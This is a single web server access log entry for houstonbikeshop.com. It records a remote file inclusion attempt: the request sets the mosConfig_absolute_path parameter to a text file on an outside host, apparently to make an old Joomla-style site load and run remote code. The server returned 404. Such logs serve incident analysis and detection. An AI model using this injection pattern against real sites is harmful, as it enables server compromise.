81.12.13.152 - - [11/Jan/2010:12:21:21 -0800] "GET /export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
